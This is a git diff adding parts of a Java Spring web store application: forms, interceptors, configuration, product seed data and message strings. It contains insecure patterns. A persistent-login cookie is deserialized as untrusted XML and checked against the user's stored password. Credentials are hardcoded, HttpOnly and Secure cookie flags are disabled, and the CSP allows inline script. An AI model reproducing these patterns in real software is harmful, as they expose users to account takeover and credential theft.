diff --git a/src/main/java/es/storeapp/web/forms/LoginForm.java b/src/main/java/es/storeapp/web/forms/LoginForm.java
new file mode 100644
index 0000000..59877d9
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/LoginForm.java
@@ -0,0 +1,44 @@
+package es.storeapp.web.forms;
+
+import jakarta.validation.constraints.NotNull;
+import jakarta.validation.constraints.Size;
+
+public class LoginForm {
+    
+    @NotNull
+    @Size(min=1)
+    private String email;
+    
+    @NotNull
+    @Size(min=1)
+    private String password;
+
+    private Boolean rememberMe;
+    
+    public String getEmail() {
+        return email;
+    }
+
+    public void setEmail(String email) {
+        this.email = email;
+    }
+
+    public String getPassword() {
+        return password;
+    }
+
+    public void setPassword(String password) {
+        this.password = password;
+    }
+
+    public Boolean getRememberMe() {
+        return rememberMe;
+    }
+
+    public void setRememberMe(Boolean rememberMe) {
+        this.rememberMe = rememberMe;
+    }
+    
+    
+    
+}
diff --git a/src/main/java/es/storeapp/web/forms/OrderForm.java b/src/main/java/es/storeapp/web/forms/OrderForm.java
new file mode 100644
index 0000000..faeec25
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/OrderForm.java
@@ -0,0 +1,42 @@
+package es.storeapp.web.forms;
+
+public class OrderForm {
+    
+    private String name;
+    private int price;
+    private String address;
+    private Boolean payNow;
+    
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    public int getPrice() {
+        return price;
+    }
+
+    public void setPrice(int price) {
+        this.price = price;
+    }
+
+    public String getAddress() {
+        return address;
+    }
+
+    public void setAddress(String address) {
+        this.address = address;
+    }
+
+    public Boolean getPayNow() {
+        return payNow;
+    }
+
+    public void setPayNow(Boolean payNow) {
+        this.payNow = payNow;
+    }
+        
+}
diff --git a/src/main/java/es/storeapp/web/forms/PaymentForm.java b/src/main/java/es/storeapp/web/forms/PaymentForm.java
new file mode 100644
index 0000000..d655114
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/PaymentForm.java
@@ -0,0 +1,60 @@
+package es.storeapp.web.forms;
+
+public class PaymentForm {
+    
+    private Boolean defaultCreditCard;
+    private String creditCard;
+    private Integer cvv;
+    private Integer expirationMonth;
+    private Integer expirationYear;
+    private Boolean save;
+
+    public Boolean getDefaultCreditCard() {
+        return defaultCreditCard;
+    }
+
+    public void setDefaultCreditCard(Boolean defaultCreditCard) {
+        this.defaultCreditCard = defaultCreditCard;
+    }
+    
+    public String getCreditCard() {
+        return creditCard;
+    }
+
+    public void setCreditCard(String creditCard) {
+        this.creditCard = creditCard;
+    }
+
+    public Integer getCvv() {
+        return cvv;
+    }
+
+    public void setCvv(Integer cvv) {
+        this.cvv = cvv;
+    }
+
+    public Integer getExpirationMonth() {
+        return expirationMonth;
+    }
+
+    public void setExpirationMonth(Integer expirationMonth) {
+        this.expirationMonth = expirationMonth;
+    }
+
+    public Integer getExpirationYear() {
+        return expirationYear;
+    }
+
+    public void setExpirationYear(Integer expirationYear) {
+        this.expirationYear = expirationYear;
+    }
+
+    public Boolean getSave() {
+        return save;
+    }
+
+    public void setSave(Boolean save) {
+        this.save = save;
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/web/forms/ProductSearchForm.java b/src/main/java/es/storeapp/web/forms/ProductSearchForm.java
new file mode 100644
index 0000000..8ff297d
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/ProductSearchForm.java
@@ -0,0 +1,15 @@
+package es.storeapp.web.forms;
+
+public class ProductSearchForm {
+    
+    private String category;
+
+    public String getCategory() {
+        return category;
+    }
+
+    public void setCategory(String category) {
+        this.category = category;
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/web/forms/ResetPasswordForm.java b/src/main/java/es/storeapp/web/forms/ResetPasswordForm.java
new file mode 100644
index 0000000..44ae1f3
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/ResetPasswordForm.java
@@ -0,0 +1,33 @@
+package es.storeapp.web.forms;
+
+public class ResetPasswordForm {
+
+    private String token;
+    private String email;
+    private String password;
+
+    public String getToken() {
+        return token;
+    }
+
+    public void setToken(String token) {
+        this.token = token;
+    }
+
+    public String getEmail() {
+        return email;
+    }
+
+    public void setEmail(String email) {
+        this.email = email;
+    }
+
+    public String getPassword() {
+        return password;
+    }
+
+    public void setPassword(String password) {
+        this.password = password;
+    }
+
+}
diff --git a/src/main/java/es/storeapp/web/forms/UserProfileForm.java b/src/main/java/es/storeapp/web/forms/UserProfileForm.java
new file mode 100644
index 0000000..8c569ff
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/UserProfileForm.java
@@ -0,0 +1,72 @@
+package es.storeapp.web.forms;
+
+import jakarta.validation.constraints.NotNull;
+import jakarta.validation.constraints.Size;
+import org.springframework.web.multipart.MultipartFile;
+
+public class UserProfileForm {
+
+    @NotNull
+    @Size(min=4)
+    private String name;
+    
+    @NotNull
+    private String email;
+    
+    private String password;
+    
+    @NotNull
+    private String address;
+    
+    private MultipartFile image;
+
+    public UserProfileForm() {
+    }
+
+    public UserProfileForm(String name, String email, String address) {
+        this.name = name;
+        this.email = email;
+        this.address = address;
+    }
+    
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    public String getEmail() {
+        return email;
+    }
+
+    public void setEmail(String email) {
+        this.email = email;
+    }
+
+    public String getPassword() {
+        return password;
+    }
+
+    public void setPassword(String password) {
+        this.password = password;
+    }
+
+    public String getAddress() {
+        return address;
+    }
+
+    public void setAddress(String address) {
+        this.address = address;
+    }
+
+    public MultipartFile getImage() {
+        return image;
+    }
+
+    public void setImage(MultipartFile image) {
+        this.image = image;
+    }    
+    
+}
diff --git a/src/main/java/es/storeapp/web/interceptors/AuthenticatedUserInterceptor.java b/src/main/java/es/storeapp/web/interceptors/AuthenticatedUserInterceptor.java
new file mode 100644
index 0000000..cbcb30a
--- /dev/null
+++ b/src/main/java/es/storeapp/web/interceptors/AuthenticatedUserInterceptor.java
@@ -0,0 +1,25 @@
+package es.storeapp.web.interceptors;
+
+import es.storeapp.common.Constants;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import jakarta.servlet.http.HttpSession;
+import org.springframework.web.servlet.HandlerInterceptor;
+
+public class AuthenticatedUserInterceptor implements HandlerInterceptor {
+    
+    @Override
+    public boolean preHandle(HttpServletRequest request, 
+                             HttpServletResponse response, 
+                             Object handler)
+            throws Exception {
+
+        HttpSession session = request.getSession();
+        if(session.getAttribute(Constants.USER_SESSION) == null) {
+            response.sendRedirect(request.getContextPath() + Constants.LOGIN_ENDPOINT +
+                    Constants.PARAMS + Constants.NEXT_PAGE + Constants.PARAM_VALUE + request.getRequestURL());
+            return false;
+        }
+        return true;
+    }
+}
diff --git a/src/main/java/es/storeapp/web/interceptors/AutoLoginInterceptor.java b/src/main/java/es/storeapp/web/interceptors/AutoLoginInterceptor.java
new file mode 100644
index 0000000..683ae41
--- /dev/null
+++ b/src/main/java/es/storeapp/web/interceptors/AutoLoginInterceptor.java
@@ -0,0 +1,53 @@
+package es.storeapp.web.interceptors;
+
+import es.storeapp.business.entities.User;
+import es.storeapp.business.services.UserService;
+import es.storeapp.common.Constants;
+import es.storeapp.web.cookies.UserInfo;
+import java.io.ByteArrayInputStream;
+import java.util.Base64;
+
+import javax.xml.bind.JAXBContext;
+import javax.xml.bind.Unmarshaller;
+
+import jakarta.servlet.http.Cookie;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import jakarta.servlet.http.HttpSession;
+import org.springframework.web.servlet.HandlerInterceptor;
+
+public class AutoLoginInterceptor implements HandlerInterceptor {
+
+    private final UserService userService;
+
+    public AutoLoginInterceptor(UserService userService) {
+        this.userService = userService;
+    }
+
+    @Override
+    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
+            throws Exception {
+
+        HttpSession session = request.getSession(true);
+        if (session.getAttribute(Constants.USER_SESSION) != null || request.getCookies() == null) {
+            return true;
+        }
+        for (Cookie c : request.getCookies()) {
+            if (Constants.PERSISTENT_USER_COOKIE.equals(c.getName())) {
+                String cookieValue = c.getValue();
+                if (cookieValue == null) {
+                    continue;
+                }
+                Base64.Decoder decoder = Base64.getDecoder();
+                JAXBContext context = JAXBContext.newInstance(UserInfo.class);
+                Unmarshaller unmarshaller = context.createUnmarshaller();
+                UserInfo userInfo = (UserInfo) unmarshaller.unmarshal(new ByteArrayInputStream(decoder.decode(cookieValue)));
+                User user = userService.findByEmail(userInfo.getEmail());
+                if (user != null && user.getPassword().equals(userInfo.getPassword())) {
+                    session.setAttribute(Constants.USER_SESSION, user);
+                }
+            }
+        }
+        return true;
+    }
+}
diff --git a/src/main/java/es/storeapp/web/interceptors/CSPInterceptor.java b/src/main/java/es/storeapp/web/interceptors/CSPInterceptor.java
new file mode 100644
index 0000000..217b96f
--- /dev/null
+++ b/src/main/java/es/storeapp/web/interceptors/CSPInterceptor.java
@@ -0,0 +1,22 @@
+package es.storeapp.web.interceptors;
+
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import org.springframework.web.servlet.HandlerInterceptor;
+
+public class CSPInterceptor implements HandlerInterceptor {
+    
+    @Override
+    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
+        throws Exception {
+        response.setHeader("Content-Security-Policy", 
+            "default-src 'self'; " +
+            "img-src 'self'; " +
+            "script-src 'self' 'unsafe-inline'; " +
+            "style-src 'self' 'unsafe-inline';" +
+            "frame-ancestors 'none';" + 
+            "object-src 'none';");
+        return true;
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/web/interceptors/LoggerInterceptor.java b/src/main/java/es/storeapp/web/interceptors/LoggerInterceptor.java
new file mode 100644
index 0000000..9652d0b
--- /dev/null
+++ b/src/main/java/es/storeapp/web/interceptors/LoggerInterceptor.java
@@ -0,0 +1,45 @@
+package es.storeapp.web.interceptors;
+
+import java.text.MessageFormat;
+import java.time.LocalDateTime;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.web.servlet.HandlerInterceptor;
+import org.springframework.web.servlet.ModelAndView;
+
+public class LoggerInterceptor implements HandlerInterceptor {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(LoggerInterceptor.class);
+    
+    @Override
+    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
+        throws Exception {
+
+        if(logger.isDebugEnabled()) {
+            logger.debug(MessageFormat.format("Request URL: {0} started at {1}", 
+                request.getRequestURL(), LocalDateTime.now()));
+        }
+
+        return true;
+    }
+
+    @Override
+    public void postHandle(HttpServletRequest request, HttpServletResponse response,
+                           Object handler, ModelAndView modelAndView) throws Exception {
+
+        if(logger.isDebugEnabled()) {
+            logger.debug(MessageFormat.format("Request URL: {0} finished at {1}", 
+                request.getRequestURL(), LocalDateTime.now()));
+        }
+    }
+
+    @Override
+    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, 
+                                Object handler, Exception ex) throws Exception {
+        if(logger.isDebugEnabled()) {
+            logger.debug(MessageFormat.format("After completion URL: {0} finished at {1}", 
+                request.getRequestURL(), LocalDateTime.now()));
+        }    }
+
+}
diff --git a/src/main/java/es/storeapp/web/interceptors/ShoppingCartInterceptor.java b/src/main/java/es/storeapp/web/interceptors/ShoppingCartInterceptor.java
new file mode 100644
index 0000000..c6b4a23
--- /dev/null
+++ b/src/main/java/es/storeapp/web/interceptors/ShoppingCartInterceptor.java
@@ -0,0 +1,23 @@
+package es.storeapp.web.interceptors;
+
+import es.storeapp.common.Constants;
+import es.storeapp.web.session.ShoppingCart;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import jakarta.servlet.http.HttpSession;
+import org.springframework.web.servlet.HandlerInterceptor;
+
+public class ShoppingCartInterceptor implements HandlerInterceptor {
+    @Override
+    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
+        throws Exception {
+
+        HttpSession session = request.getSession(true);
+
+        if(session.getAttribute(Constants.SHOPPING_CART_SESSION) == null) {
+            session.setAttribute(Constants.SHOPPING_CART_SESSION, new ShoppingCart());
+        }
+        
+        return true;
+    }
+}
diff --git a/src/main/java/es/storeapp/web/session/ShoppingCart.java b/src/main/java/es/storeapp/web/session/ShoppingCart.java
new file mode 100644
index 0000000..6429f95
--- /dev/null
+++ b/src/main/java/es/storeapp/web/session/ShoppingCart.java
@@ -0,0 +1,31 @@
+package es.storeapp.web.session;
+
+import es.storeapp.business.entities.Product;
+import java.io.Serializable;
+import java.util.ArrayList;
+import java.util.List;
+
+public class ShoppingCart implements Serializable {
+
+    private static final long serialVersionUID = 8032734613287752106L; 
+    
+    private final List<Product> products = new ArrayList<>();
+
+    public List<Product> getProducts() {
+        return products;
+    }
+    
+    public boolean contains(Long id) {
+        return products.stream().anyMatch(product -> (product.getProductId().equals(id)));
+    }
+    
+    public int getTotalPrice() {
+        int totalPrice = 0;
+        return products.stream().map(product -> product.getPrice()).reduce(totalPrice, Integer::sum);
+    }
+    
+    public void clear() {
+        products.clear();
+    }
+    
+}
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
new file mode 100644
index 0000000..71d5c64
--- /dev/null
+++ b/src/main/resources/application.properties
@@ -0,0 +1,75 @@
+# ===============================
+# Custom properties
+# ===============================
+
+server.cofiguration.resources=work
+server.servlet.session.timeout=10800
+server.servlet.session.tracking-modes=cookie
+#server.servlet.session.http-only=true
+#server.servlet.session.secure=true
+
+# ===============================
+# Web
+# ===============================
+
+server.port=8888
+
+server.ssl.key-store-type=PKCS12
+server.ssl.key-store=server.p12
+server.ssl.key-store-password=magic
+
+server.error.path=/Error
+server.error.include-exception=false
+server.error.include-stacktrace=never
+
+# ===============================
+# Datasource
+# ===============================
+
+spring.datasource.url=jdbc:derby:database
+spring.datasource.username=app
+spring.datasource.password=secr3t
+spring.datasource.driver-class-name=org.apache.derby.jdbc.EmbeddedDriver
+spring.datasource.continue-on-error=false
+spring.datasource.initialization-mode=never
+spring.sql.init.mode=never
+
+# ===============================
+# JPA
+# ===============================
+
+spring.jpa.show-sql=true
+spring.jpa.properties.hibernate.format_sql=true
+spring.jpa.properties.hibernate.type=error
+spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.DerbyDialect
+spring.jpa.hibernate.ddl-auto=none
+
+# ===============================
+# Mail
+# ===============================
+
+server.cofiguration.mail-host=
+server.cofiguration.mail-port=
+server.cofiguration.mail-username=
+server.cofiguration.mail-password=
+server.cofiguration.mail-ssl-enable=
+server.cofiguration.mail-start-tls-enable=
+server.cofiguration.mail-from=
+
+# ===============================
+# Logging
+# ===============================
+
+debug=false
+logging.level.es.storeapp=DEBUG
+logging.level.org.springframework.web=ERROR
+logging.level.org.thymeleaf=ERROR
+logging.level.com.zaxxer.hikari.pool=ERROR
+logging.file.name=./log/server.log
+
+# ===============================
+# Management
+# ===============================
+
+management.endpoints.web.exposure.include=
+management.endpoint.shutdown.enabled=false
\ No newline at end of file
diff --git a/src/main/resources/data.sql b/src/main/resources/data.sql
new file mode 100644
index 0000000..c088681
--- /dev/null
+++ b/src/main/resources/data.sql
@@ -0,0 +1,72 @@
+-- Categories
+INSERT INTO Categories (category_id, name, description, icon, highlighted) VALUES (1, 'Laptops', 'Lightweight, Everyday Computing and Desktop Replacement', 'fa-laptop', true);
+INSERT INTO Categories (category_id, name, description, icon, highlighted) VALUES (2, 'Cameras', 'Standard Compact, Zoom Compact, Adventure Cameras, Advanced Compact and Super-Zoom', 'fa-camera', true);
+INSERT INTO Categories (category_id, name, description, icon, highlighted) VALUES (3, 'Mobile Phones', 'Smart Phones, Camera Phones, Music Phones, 5G Phones and Basic Phones', 'fa-mobile-alt', true);
+INSERT INTO Categories (category_id, name, description, icon, highlighted) VALUES (4, 'TV', 'LCD, LED and OLED', 'fa-tv', true);
+INSERT INTO Categories (category_id, name, description, icon, highlighted) VALUES (5, 'Desktop Computers', 'Small Desktops, Gaming PC, All-In-One and Power Servers', 'fa-desktop', false);
+INSERT INTO Categories (category_id, name, description, icon, highlighted) VALUES (6, 'Tablets', 'High Resolution, Best Performance, Wi-Fi Only and 4G', 'fa-tablet-alt', false);
+INSERT INTO Categories (category_id, name, description, icon, highlighted) VALUES (7, 'Accesories', 'Keyboards, Hard Disks, Microphones, Wifi Routers, and much more', 'fa-keyboard', false);
+
+-- Laptops
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (1, 1, 'Ultra Portable', 'Processor Speed 1.1MHz, RAM 4G, Storage 64 GB, Screen 13.3 inches', 'fa-laptop', 380, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (2, 1, 'General Purpose', 'Processor Speed 2.4MHz, RAM 4G, Storage 1 TB, Screen 15.6 inches', 'fa-laptop', 420, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (3, 1, 'Business Small', 'Processor Speed 2.4MHz, RAM 4G, Storage 128 GB, Screen 13.3 inches', 'fa-laptop', 535, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (4, 1, 'Business', 'Processor Speed 2.4MHz, RAM 8G, Storage 512 GB, Screen 14 inches', 'fa-laptop', 780, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (5, 1, 'Gaming', 'Processor Speed 2.8MHz, RAM 16G, Storage 2 TB, Screen 15.6 inches', 'fa-laptop', 925, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (6, 1, 'Ultra Power Small', 'Processor Speed 2.4MHz, RAM 16G, Storage 1 TB, Screen 12.2 inches', 'fa-laptop', 1095, 0, 0, 0);
+
+-- Cameras
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (7,  2, 'Compact 16', 'Resolution 16 MP, Optical Zoom 3.8, Popup flash, Wi-Fi', 'fa-camera', 165, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (8,  2, 'Compact 20', 'Resolution 20.2 MP, Optical Zoom 4.2, Popup flash, Touch Screen Display', 'fa-camera', 430, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (9,  2, 'DSLR 24', 'Resolution  24.2MP, Autofocus 11-point AF, ISO Range 100 to 51200', 'fa-camera', 540, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (10, 2, 'DSLR 36', 'Resolution  35.3MP, Autofocus 51-point AF, ISO Range 64 to 51200', 'fa-camera-retro', 975, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (11, 2, 'WaterProof 14', 'Resolution  14.2MP, Interchangeable Lenses, Operational Water Depep up to 49 feet', 'fa-camera-retro', 780, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (12, 2, 'Camcorder 20', 'Resolution  20MP, LCD Screen 3 inches', 'fa-video', 990, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (13, 2, 'Camcorder 36', 'Resolution  35.3MP, LCD Screen 3.5 inches', 'fa-video', 1090, 0, 0, 0);
+
+-- Mobile Phones
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (14, 3, '2G Home', 'Display 3 inches, Camera 2MP, Battery 500mAh', 'fa-mobile', 60, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (15, 3, 'Smart Quad core 5', 'RAM 3GB, Display 5 inches, Storage 16GB, Camera 12MP, Battery 3000mAh', 'fa-mobile-alt', 150, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (16, 3, 'Smart Quad core 5.5', 'RAM 3GB, Display 5.5 inches, Storage 16GB, Camera 12MP, Battery 3500mAh', 'fa-mobile-alt', 170, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (17, 3, 'Smart Quad core 6', 'RAM 4GB, Display 6 inches, Storage 32GB, Camera 20MP, Battery 4000mAh', 'fa-mobile-alt', 250, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (18, 3, 'Smart Octa core 5', 'RAM 4GB, Display 5 inches, Storage 16GB, Camera 16MP, Battery 4000mAh', 'fa-mobile-alt', 280, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (19, 3, 'Smart Octa core 5.5', 'RAM 8GB, Display 5.5 inches, Storage 32GB, Camera 20MP, Battery 4000mAh', 'fa-mobile-alt', 350, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (20, 3, 'Smart Octa core 6', 'RAM 8GB, Display 6 inches, Storage 64GB, Camera 24MP, Battery 5000mAh', 'fa-mobile-alt', 505, 0, 0, 0);
+
+-- TV
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (21, 4, 'LED 32', 'Display Size 32 inches, Resolution 720p, Flat', 'fa-tv', 200, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (22, 4, 'Smart LED 32', 'Display Size 32 inches, Resolution 720p, Smart TV, Flat', 'fa-tv', 235, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (23, 4, 'Smart LED HD 64', 'Display Size 64 inches, Resolution 1080p, Smart TV, Flat', 'fa-tv', 400, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (24, 4, 'OLED 64', 'Display Size 64 inches, Resolution 1080p, Flat', 'fa-tv', 510, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (25, 4, 'Smart OLED 72', 'Display Size 72 inches, Resolution 1080p, Smart TV, Flat', 'fa-tv', 730, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (26, 4, 'Smart LED HD 80', 'Display Size 80 inches, Resolution 4K, Smart TV, Flat', 'fa-tv', 970, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (27, 4, 'Smart LED HD Plus 120', 'Display Size 120 inches, Resolution 4k, Smart TV, Curved', 'fa-tv', 1295, 0, 0, 0);
+
+-- Desktop Computers
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (28, 5, 'Single Core Home 3', 'Single core 3GHz processor, 4GB RAM, 1TB Hard Drive', 'fa-desktop', 200, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (29, 5, 'Dual Core Home 3', 'Dual core 3GHz processor, 8GB RAM, 1TB Hard Drive', 'fa-desktop', 230, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (30, 5, 'Dual Core Home 3 Gamming', 'Dual core 3GHz processor, 8GB RAM, 1TB Hard Drive, Advanced Graphic Card', 'fa-desktop', 280, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (31, 5, 'Dual Core Office 3', 'Dual core 3.1GHz processor, 8GB RAM, 1TB Hard Drive, Wi-Fi', 'fa-desktop', 350, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (32, 5, 'Quad Core Office 4', 'Dual core 3.9GHz processor, 16GB RAM, 2TB Hard Drive, Wi-Fi', 'fa-desktop', 400, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (33, 5, 'Quad Core Office 4 Premiun', 'Dual core 3.9GHz processor, 32GB RAM, 3TB Hard Drive, Wi-Fi', 'fa-desktop', 600, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (34, 5, 'Quad Core Office 4 Server', 'Dual core 3.9GHz processor plus, 64GB RAM, 4TB Hard Drive, Wi-Fi', 'fa-server', 850, 0, 0, 0);
+
+-- Tablets
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (35, 6, 'Home 7', 'RAM 2GB, Display 7 inches, Storage 8GB, Camera 2MP, Battery 3000mAh', 'fa-tablet-alt', 150, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (36, 6, 'Home 8', 'RAM 2GB, Display 8 inches, Storage 16GB, Camera 2MP, Battery 3000mAh', 'fa-tablet-alt', 180, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (37, 6, 'Home 8 HD', 'RAM 2GB, Display 8 inches HD, Storage 16GB, Camera 2MP, Battery 3500mAh', 'fa-tablet-alt', 250, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (38, 6, 'Business 7', 'RAM 3GB, Display 7 inches, Storage 16GB, Camera 5MP, Battery 4000mAh', 'fa-tablet-alt', 230, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (39, 6, 'Business 8', 'RAM 4GB, Display 8 inches, Storage 32GB, Camera 5MP, Battery 4000mAh', 'fa-tablet-alt', 295, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (40, 6, 'Business 8 HD', 'RAM 4GB, Display 8 inches HD, Storage 32GB, Camera 5MP, Battery 4800mAh', 'fa-tablet-alt', 430, 0, 0, 0);
+
+-- Accesories
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (41, 7, 'Wireless Keyboard', 'Wireless wave keyboard and mouse combo, includes keyboard and mouse, long battery life, ergonomic wave design', 'fa-keyboard', 90, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (42, 7, 'HDD 1TB', 'External HDD, 1TB SATA, 7200 RPM, 64 MB Cache', 'fa-hdd', 55, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (43, 7, 'HDD 2TB', 'External HDD, 2TB SATA, 7200 RPM, 64 MB Cache', 'fa-hdd', 75, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (44, 7, 'HDD SSD 500', 'External HDD, 512MB SATA III, 520Mb/s', 'fa-hdd', 120, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (45, 7, 'HDD SSD 1TB', 'External HDD, 1TB SATA III, 520Mb/s', 'fa-hdd', 250, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (46, 7, 'Headphones', 'Lightweight over ear headphones with microphone integrated', 'fa-headphones', 45, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (47, 7, 'Wireless Headphones', 'Wireless lightweight over ear headphones with microphone integrated', 'fa-headphones', 120, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (48, 7, 'Compact Printer', 'Wireless All-In-One compact printer', 'fa-print', 265, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (49, 7, 'Portable Power Bank 5', 'Phone charger 5000mAh, portable power bank ultra slim LED', 'fa-battery-full', 50, 0, 0, 0);
+INSERT INTO Products (product_id, category, name, description, icon, price, total_score, total_comments, sales) VALUES (50, 7, 'Portable Power Bank 10', 'Phone charger 10000mAh, portable power bank ultra slim LED', 'fa-battery-full', 75, 0, 0, 0);
\ No newline at end of file
diff --git a/src/main/resources/messages.properties b/src/main/resources/messages.properties
new file mode 100644
index 0000000..2fdd667
--- /dev/null
+++ b/src/main/resources/messages.properties
@@ -0,0 +1,181 @@
+# HTML messages
+
+navbar.home=Home
+navbar.products=Products
+navbar.cart=Cart
+navbar.orders=Orders
+navbar.account=Account
+navbar.profile=Profile
+navbar.password=Change Password
+navbar.login=Login
+navbar.register=Register
+navbar.logout=Logout
+
+registration.title=New User Registration
+registration.button=Register
+registration.success=User created successfully, welcome <b>{0}</b>
+
+edit.profile.title=Update User Profile
+edit.profile.button=Update
+
+profile.input.name=Name
+profile.input.name.validation=Your name must be alphanumeric with at least 4 characters
+profile.input.name.placeholder=Enter your name
+profile.input.email=Email address
+profile.input.email.placeholder=Enter email
+profile.input.email.validation=The email address is invalid
+profile.input.email.tip=We'll never share your email with anyone else
+profile.input.password=Password
+profile.input.password.placeholder=Use a strong password
+profile.input.password.validation=Password is not strong enough
+profile.input.password.confirm=Confirm Password
+profile.input.password.confirm.placeholder=Confirm Password
+profile.input.password.confirm.validation=Passwords do not match
+profile.input.address=Address
+profile.input.address.validation=Address can not be empty
+profile.input.image=Profile image
+profile.input.image.validation=Profile image is not valid
+profile.input.image.tip= This image will be publicly shown in your product reviews and must be a jpeg
+profile.input.current.image=Current image
+profile.updated.success=User profile updated successfully
+
+login.title=Login
+login.button=Login
+login.input.password.placeholder=Enter your password
+login.input.password.validation=Password is too short
